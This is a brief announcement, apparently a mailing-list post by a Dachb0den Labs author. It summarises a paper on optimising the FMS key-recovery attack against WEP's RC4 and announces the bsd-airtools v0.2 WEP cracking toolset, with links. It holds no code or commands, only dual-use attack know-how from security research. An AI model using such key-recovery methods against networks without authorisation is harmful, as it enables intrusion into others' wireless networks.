Practical Exploitation of RC4 Weaknesses in WEP Environments This document will give a brief background on 802.11b based WEP weaknesses and outline a few additional flaws in rc4 that stem off of the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR) and describes specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a wep auditing toolset, which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of iv collection time as well as cracking and processing time and to provide details on how other pseudo random generation algorithm (prga) output bytes reveal key information. http://www.dachb0den.com/projects/bsd-airtools/wepexp.txt I'd also like to announce that I've just released bsd-airtools v0.2 which implements this outlined form of attack and allows you to crack weak keys with quite fewer collected packets than any wep cracking applications that are currently available. http://www.dachb0den.com/projects/bsd-airtools.html Cheers, -h1kari
